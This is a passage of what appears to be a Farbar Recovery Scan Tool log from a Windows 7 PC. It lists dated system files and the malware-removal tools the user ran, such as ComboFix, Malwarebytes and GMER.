2015-09-27 20:55 - 2014-05-14 18:21 - 02620928 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2015-09-27 20:55 - 2014-05-14 18:20 - 00097792 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2015-09-27 20:55 - 2014-05-14 18:17 - 00092672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2015-09-27 20:54 - 2014-05-14 09:23 - 00198600 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2015-09-27 20:54 - 2014-05-14 09:23 - 00179656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2015-09-27 20:54 - 2014-05-14 09:20 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2015-09-27 20:54 - 2014-05-14 09:17 - 00033792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2015-09-23 13:01 - 2015-09-23 13:01 - 00001143 _____ C:\Users\Kenny G\Desktop\Fixlist.txt
2015-09-23 06:35 - 2015-09-23 06:35 - 00000000 ____D C:\Windows\system32\SPReview
2015-09-23 05:40 - 2015-09-29 09:44 - 00001210 _____ C:\Windows\setupact.log
2015-09-23 05:40 - 2015-09-29 09:22 - 00464032 _____ C:\Windows\system32\FNTCACHE.DAT
2015-09-23 05:40 - 2015-09-29 09:22 - 00006624 _____ C:\Windows\PFRO.log
2015-09-23 05:40 - 2015-09-23 05:40 - 00000000 _____ C:\Windows\setuperr.log
2015-09-23 05:31 - 2015-09-23 05:31 - 00001589 _____ C:\Users\Kenny G\Desktop\mabam neu.txt
2015-09-23 05:28 - 2015-09-23 07:14 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-09-23 04:59 - 2015-09-23 04:59 - 00000000 ____D C:\Users\Kenny G\Downloads\FRST-OlderVersion
2015-09-23 04:58 - 2015-09-28 23:14 - 00120216 _____ C:\Users\Kenny G\AppData\Local\GDIPFONTCACHEV1.DAT
2015-09-22 06:36 - 2015-09-22 06:36 - 00001583 _____ C:\Users\Kenny G\Desktop\neu.txt
2015-09-21 18:38 - 2015-09-21 18:38 - 00028509 _____ C:\ComboFix.txt
2015-09-21 18:13 - 2011-06-26 08:45 - 00256000 _____ C:\Windows\PEV.exe
2015-09-21 18:13 - 2010-11-07 19:20 - 00208896 _____ C:\Windows\MBR.exe
2015-09-21 18:13 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2015-09-21 18:13 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2015-09-21 18:13 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2015-09-21 18:13 - 2000-08-31 02:00 - 00098816 _____ C:\Windows\sed.exe
2015-09-21 18:13 - 2000-08-31 02:00 - 00080412 _____ C:\Windows\grep.exe
2015-09-21 18:13 - 2000-08-31 02:00 - 00068096 _____ C:\Windows\zip.exe
2015-09-21 18:12 - 2015-09-21 18:38 - 00000000 ____D C:\Qoobox
2015-09-21 18:12 - 2015-09-21 18:36 - 00000000 ____D C:\Windows\erdnt
2015-09-21 18:10 - 2015-09-21 18:10 - 05635484 ____R (Swearware) C:\Users\Kenny G\Downloads\ComboFix.exe
2015-09-20 19:56 - 2015-09-20 19:56 - 00000000 _____ C:\Users\Kenny G\Desktop\Neues Textdokument.txt
2015-09-20 19:46 - 2015-09-20 19:46 - 00040674 _____ C:\Users\Kenny G\Desktop\AVG log.csv
2015-09-20 19:42 - 2015-09-20 19:35 - 00058541 _____ C:\Users\Kenny G\Desktop\FRST.txt
2015-09-20 19:42 - 2015-09-20 19:35 - 00044699 _____ C:\Users\Kenny G\Desktop\Addition.txt
2015-09-20 19:42 - 2015-09-20 18:20 - 00054932 _____ C:\Users\Kenny G\Desktop\mbam-log-2015-09-20 (17-46-10).xml
2015-09-20 19:29 - 2015-09-20 19:30 - 00032570 _____ C:\Users\Kenny G\Desktop\GMER.txt
2015-09-20 19:19 - 2015-09-20 19:19 - 00380416 _____ C:\Users\Kenny G\Downloads\Gmer-19357.exe
2015-09-20 19:17 - 2015-09-23 05:01 - 00040133 _____ C:\Users\Kenny G\Downloads\Addition.txt
2015-09-20 19:16 - 2015-09-29 09:48 - 00019716 _____ C:\Users\Kenny G\Downloads\FRST.txt
2015-09-20 19:15 - 2015-09-29 09:47 - 00000000 ____D C:\FRST
2015-09-20 19:14 - 2015-09-23 04:59 - 02192384 _____ (Farbar) C:\Users\Kenny G\Downloads\FRST64.exe
2015-09-20 19:14 - 2015-09-20 19:14 - 00000476 _____ C:\Users\Kenny G\Downloads\defogger_disable.log
2015-09-20 19:14 - 2015-09-20 19:14 - 00000000 _____ C:\Users\Kenny G\defogger_reenable
2015-09-20 19:13 - 2015-09-20 19:13 - 00050477 _____ C:\Users\Kenny G\Downloads\Defogger.exe
2015-09-20 19:07 - 2015-09-20 19:07 - 00000000 ____D C:\Users\Kenny G\Desktop\Festplatte
2015-09-20 18:19 - 2015-09-20 18:19 - 00004680 _____ C:\Users\Kenny G\Desktop\JRT.txt
2015-09-20 18:00 - 2015-09-20 18:00 - 01798976 _____ (Malwarebytes) C:\Users\Kenny G\Downloads\JRT.exe
2015-09-20 17:43 - 2015-09-23 04:58 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-09-20 17:42 - 2015-09-20 17:42 - 00001157 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 
2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2015-09-20 17:42 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-09-20 17:42 - 2015-06-18 08:41 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-09-20 17:42 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-09-20 17:36 - 2015-09-20 17:38 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Kenny G\Downloads\mbam-setup-2.1.8.1057.exe
2015-09-20 17:36 - 2015-09-20 17:37 - 01662976 _____ C:\Users\Kenny G\Downloads\AdwCleaner_5.008.exe
2015-09-19 17:14 - 2015-09-19 17:15 - 01457952 _____ C:\Users\Kenny G\Downloads\Trojan Remover - CHIP-Installer.exe
2015-09-19 16:17 - 2015-09-19 16:48 - 00000000 ____D C:\Windows\system32\MRT
2015-09-19 16:16 - 2015-09-19 16:16 - 00000000 ____D C:\Windows\system32\EventProviders
2015-09-19 16:13 - 2010-11-05 03:57 - 01942856 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2015-09-19 16:13 - 2010-11-05 03:57 - 00048976 _____ (Microsoft Corporation) C:\Windows\system32\netfxperf.dll
2015-09-19 16:12 - 2010-11-20 15:33 - 01924480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2015-09-19 16:12 - 2010-11-20 15:33 - 01659776 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2015-09-19 16:12 - 2010-11-20 15:33 - 00299392 _____ (Microsoft Corporation) C:\Windows\system32\mcupdate_GenuineIntel.dll
2015-09-19 16:12 - 2010-11-20 15:33 - 00273792 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msiscsi.sys
2015-09-19 16:12 - 2010-11-20 15:28 - 01731936 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 14633472 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 14174208 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 08988160 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 03860992 _____ (Microsoft Corporation) C:\Windows\system32\UIRibbon.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 03715584 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 03650560 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 03027968 _____ (Microsoft Corporation) C:\Windows\system32\WMVCORE.DLL
2015-09-19 16:12 - 2010-11-20 15:27 - 03008000 _____ (Microsoft Corporation) C:\Windows\system32\xpsservices.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 02314752 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 02223616 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 02086912 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 02018304 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 01888256 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2015-09-19 16:12 - 2010-11-20 15:27 - 01881088 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 01753088 _____ (Microsoft Corporation) C:\Windows\system32\vssapi.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 01743360 _____ (Microsoft Corporation) C:\Windows\system32\sysmain.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 01646080 _____ (Microsoft Corporation) C:\Windows\system32\wevtsvc.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 01556992 _____ (Microsoft Corporation) C:\Windows\system32\RacEngn.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 01490944 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 01465344 _____ (Microsoft Corporation) C:\Windows\system32\XpsPrint.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 01326080 _____ (Microsoft Corporation) C:\Windows\system32\NaturalLanguage6.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 01219584 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 01197056 _____ (Microsoft Corporation) C:\Windows\system32\taskschd.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 01188864 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 01110016 _____ (Microsoft Corporation) C:\Windows\system32\schedsvc.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 01109504 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 00960512 _____ (Microsoft Corporation) C:\Windows\system32\CPFilters.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 00488448 _____ (Microsoft Corporation) C:\Windows\system32\secproc.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 00485888 _____ (Microsoft Corporation) C:\Windows\system32\secproc_isv.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 00263168 _____ (Microsoft Corporation) C:\Windows\system32\spwizui.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 00133632 _____ (Microsoft Corporation) C:\Windows\system32\tssrvlic.dll
2015-09-19 16:12 - 2010-11-20 15:27 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyExtension.dll
2015-09-19 16:12 - 2010-11-20 15:26 - 12260864 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-09-19 16:12 - 2010-11-20 15:26 - 04120064 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2015-09-19 16:12 - 2010-11-20 15:26 - 03205120 _____ (Microsoft Corporation) C:\Windows\system32\mmcndmgr.dll
2015-09-19 16:12 - 2010-11-20 15:26 - 02565632 _____ (Microsoft Corporation) C:\Windows\system32\esent.dll
2015-09-19 16:12 - 2010-11-20 15:26 - 02444288 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-09-19 16:12 - 2010-11-20 15:26 - 01866240 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2015-09-19 16:12 - 2010-11-20 15:26 - 01838080 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2015-09-19 16:12 - 2010-11-20 15:26 - 01544192 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2015-09-19 16:12 - 2010-11-20 15:26 - 01340416 _____ (Microsoft Corporation) C:\Windows\system32\diagperf.dll
2015-09-19 16:12 - 2010-11-20 15:26 - 00919040 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-09-19 16:12 - 2010-11-20 15:26 - 00828416 _____ (Microsoft Corporation) C:\Windows\system32\MPSSVC.dll
2015-09-19 16:12 - 2010-11-20 15:25 - 03957760 _____ (Microsoft Corporation) C:\Windows\system32\WinSAT.exe
2015-09-19 16:12 - 2010-11-20 15:25 - 01975296 _____ (Microsoft Corporation) C:\Windows\system32\CertEnroll.dll
2015-09-19 16:12 - 2010-11-20 15:25 - 00902144 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll
2015-09-19 16:12 - 2010-11-20 15:25 - 00598016 _____ (Microsoft Corporation) C:\Windows\system32\spinstall.exe
2015-09-19 16:12 - 2010-11-20 15:25 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\RMActivate_isv.exe
2015-09-19 16:12 - 2010-11-20 15:25 - 00359424 _____ (Microsoft Corporation) C:\Windows\system32\RMActivate.exe
2015-09-19 16:12 - 2010-11-20 15:25 - 00301568 _____ (Microsoft Corporation) C:\Windows\system32\spreview.exe
2015-09-19 16:12 - 2010-11-20 15:25 - 00095744 _____ C:\Windows\system32\RDVGHelper.exe
2015-09-19 16:12 - 2010-11-20 15:24 - 02872320 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2015-09-19 16:12 - 2010-11-20 14:21 - 12872192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2015-09-19 16:12 - 2010-11-20 14:21 - 11410432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2015-09-19 16:12 - 2010-11-20 14:21 - 01548288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2015-09-19 16:12 - 2010-11-20 14:21 - 00870912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XpsPrint.dll
2015-09-19 16:12 - 2010-11-20 14:21 - 00423936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secproc_isv.dll
2015-09-19 16:12 - 2010-11-20 14:20 - 00428032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secproc.dll
2015-09-19 16:12 - 2010-11-20 14:19 - 10990080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-09-19 16:12 - 2010-11-20 14:19 - 05977600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-09-19 16:12 - 2010-11-20 14:19 - 03215872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2015-09-19 16:12 - 2010-11-20 14:19 - 03207680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2015-09-19 16:12 - 2010-11-20 14:19 - 02064384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-09-19 16:12 - 2010-11-20 14:19 - 01698816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\esent.dll
2015-09-19 16:12 - 2010-11-20 14:19 - 01401344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2015-09-19 16:12 - 2010-11-20 14:19 - 00954752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc40.dll
2015-09-19 16:12 - 2010-11-20 14:19 - 00954288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc40u.dll
2015-09-19 16:12 - 2010-11-20 14:18 - 01334272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CertEnroll.dll
2015-09-19 16:12 - 2010-11-20 14:18 - 01171456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10warp.dll
2015-09-19 16:12 - 2010-11-20 14:18 - 00739840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1.dll
2015-09-19 16:12 - 2010-11-20 14:17 - 00327168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RMActivate_isv.exe
2015-09-19 16:12 - 2010-11-20 14:17 - 00322048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RMActivate.exe
2015-09-19 16:12 - 2010-11-20 14:17 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PushPrinterConnections.exe
2015-09-19 16:12 - 2010-11-20 13:07 - 00162816 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2015-09-19 16:12 - 2010-11-20 13:07 - 00059392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbFlt.sys
2015-09-19 16:12 - 2010-11-20 13:05 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\rdpdd.dll
2015-09-19 16:12 - 2010-11-20 11:53 - 03126272 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-09-19 16:12 - 2010-11-05 04:20 - 00347904 _____ C:\Windows\system32\systemsf.ebd
2015-09-19 16:12 - 2010-11-05 03:58 - 01130824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2015-09-19 16:12 - 2010-11-05 03:58 - 00297808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscoree.dll
2015-09-19 16:12 - 2010-11-05 03:57 - 00444752 _____ (Microsoft Corporation) C:\Windows\system32\mscoree.dll
2015-09-19 16:12 - 2010-11-05 03:53 - 00320352 _____ (Microsoft Corporation) C:\Windows\system32\PresentationHost.exe
2015-09-19 16:12 - 2010-11-05 03:53 - 00295264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationHost.exe
2015-09-19 16:12 - 2010-11-05 03:53 - 00109928 _____ (Microsoft Corporation) C:\Windows\system32\PresentationHostProxy.dll
2015-09-19 16:12 - 2010-11-05 03:53 - 00099176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationHostProxy.dll
2015-09-19 16:12 - 2009-07-14 03:16 - 00629760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pmcsnap.dll
2015-09-19 16:12 - 2009-07-14 03:16 - 00238080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ppcsnap.dll
2015-09-19 16:11 - 2010-11-20 15:39 - 05066752 _____ (Microsoft Corporation) C:\Windows\system32\AuthFWSnapin.dll
2015-09-19 16:11 - 2010-11-20 15:34 - 00295808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volsnap.sys
2015-09-19 16:11 - 2010-11-20 15:34 - 00215936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vhdmp.sys
2015-09-19 16:11 - 2010-11-20 15:34 - 00199552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vmbus.sys
2015-09-19 16:11 - 2010-11-20 15:33 - 00982912 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2015-09-19 16:11 - 2010-11-20 15:33 - 00951680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2015-09-19 16:11 - 2010-11-20 15:33 - 00642944 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2015-09-19 16:11 - 2010-11-20 15:33 - 00376192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2015-09-19 16:11 - 2010-11-20 15:33 - 00366976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msrpc.sys
2015-09-19 16:11 - 2010-11-20 15:33 - 00289664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fltMgr.sys
2015-09-19 16:11 - 2010-11-20 15:33 - 00189824 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys
2015-09-19 16:11 - 2010-11-20 15:33 - 00184704 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pci.sys
2015-09-19 16:11 - 2010-11-20 15:33 - 00166272 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvstor.sys
2015-09-19 16:11 - 2010-11-20 15:33 - 00148352 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvraid.sys
2015-09-19 16:11 - 2010-11-20 15:32 - 00107904 _____ (Advanced Micro Devices) C:\Windows\system32\Drivers\amdsata.sys
2015-09-19 16:11 - 2010-11-20 15:29 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll
2015-09-19 16:11 - 2010-11-20 15:28 - 00605552 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2015-09-19 16:11 - 2010-11-20 15:28 - 00566208 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2015-09-19 16:11 - 2010-11-20 15:28 - 00518672 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2015-09-19 16:11 - 2010-11-20 15:28 - 00459248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2015-09-19 16:11 - 2010-11-20 15:28 - 00298104 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 03211776 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 02652160 _____ (Microsoft Corporation) C:\Windows\system32\netshell.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 02543616 _____ (Microsoft Corporation) C:\Windows\system32\wpdshext.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 02262528 _____ (Microsoft Corporation) C:\Windows\system32\SyncCenter.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 02072576 _____ (Microsoft Corporation) C:\Windows\system32\WMPEncEn.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 02055680 _____ (Microsoft Corporation) C:\Windows\system32\Query.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 02004480 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01900544 _____ (Microsoft Corporation) C:\Windows\system32\setupapi.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01808384 _____ (Microsoft Corporation) C:\Windows\system32\pnidui.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01572352 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01509888 _____ (Microsoft Corporation) C:\Windows\system32\msdtctm.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01441280 _____ (Microsoft Corporation) C:\Windows\system32\wlanpref.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01389056 _____ (Microsoft Corporation) C:\Windows\system32\pla.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01281024 _____ (Microsoft Corporation) C:\Windows\system32\werconcpl.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01243136 _____ (Microsoft Corporation) C:\Windows\system32\WMNetMgr.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01212416 _____ (Microsoft Corporation) C:\Windows\system32\propsys.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01158656 _____ (Microsoft Corporation) C:\Windows\system32\webservices.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01118208 _____ (Microsoft Corporation) C:\Windows\system32\sbe.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01098240 _____ (Microsoft Corporation) C:\Windows\system32\Vault.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01082880 _____ (Microsoft Corporation) C:\Windows\system32\sppobjs.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01050624 _____ (Microsoft Corporation) C:\Windows\system32\printui.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01026560 _____ (Microsoft Corporation) C:\Windows\system32\mstime.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01024512 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 01008128 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00933888 _____ (Microsoft Corporation) C:\Windows\system32\sqlsrv32.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00867840 _____ (Microsoft Corporation) C:\Windows\system32\SearchFolder.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00861696 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00849920 _____ (Microsoft Corporation) C:\Windows\system32\qmgr.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00800256 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00778752 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00758784 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\PortableDeviceApi.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00751104 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00750080 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00722944 _____ (Microsoft Corporation) C:\Windows\system32\EncDec.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00720896 _____ (Microsoft Corporation) C:\Windows\system32\odbc32.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00702464 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00695808 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00680960 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00625664 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00612864 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00605696 _____ (Microsoft Corporation) C:\Windows\system32\wmpeffects.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00582656 _____ (Microsoft Corporation) C:\Windows\system32\sxs.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00580096 _____ (Microsoft Corporation) C:\Windows\system32\wiaservc.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00577536 _____ (Microsoft Corporation) C:\Windows\system32\WSDApi.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\mspbda.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00552960 _____ (Microsoft Corporation) C:\Windows\system32\msdri.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00524288 _____ (Microsoft Corporation) C:\Windows\system32\wmicmiplugin.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00519680 _____ (Microsoft Corporation) C:\Windows\system32\netcfgx.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00512000 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00501248 _____ (Microsoft Corporation) C:\Windows\system32\WinSATAPI.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00481280 _____ (Microsoft Corporation) C:\Windows\system32\wmpps.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00476160 _____ (Microsoft Corporation) C:\Windows\system32\QAGENTRT.DLL
2015-09-19 16:11 - 2010-11-20 15:27 - 00473600 _____ (Microsoft Corporation) C:\Windows\system32\taskcomp.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00470016 _____ (Microsoft Corporation) C:\Windows\system32\XpsGdiConverter.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00457216 _____ (Microsoft Corporation) C:\Windows\system32\msdrm.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00448512 _____ (Microsoft Corporation) C:\Windows\system32\shlwapi.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00444416 _____ (Microsoft Corporation) C:\Windows\system32\winhttp.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00409600 _____ (Microsoft Corporation) C:\Windows\system32\photowiz.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\umpnpmgr.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00395776 _____ (Microsoft Corporation) C:\Windows\system32\webio.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00370688 _____ (Microsoft Corporation) C:\Windows\system32\shsvcs.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00326144 _____ (Microsoft Corporation) C:\Windows\system32\mswsock.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00324096 _____ (Microsoft Corporation) C:\Windows\system32\netdiagfx.dll
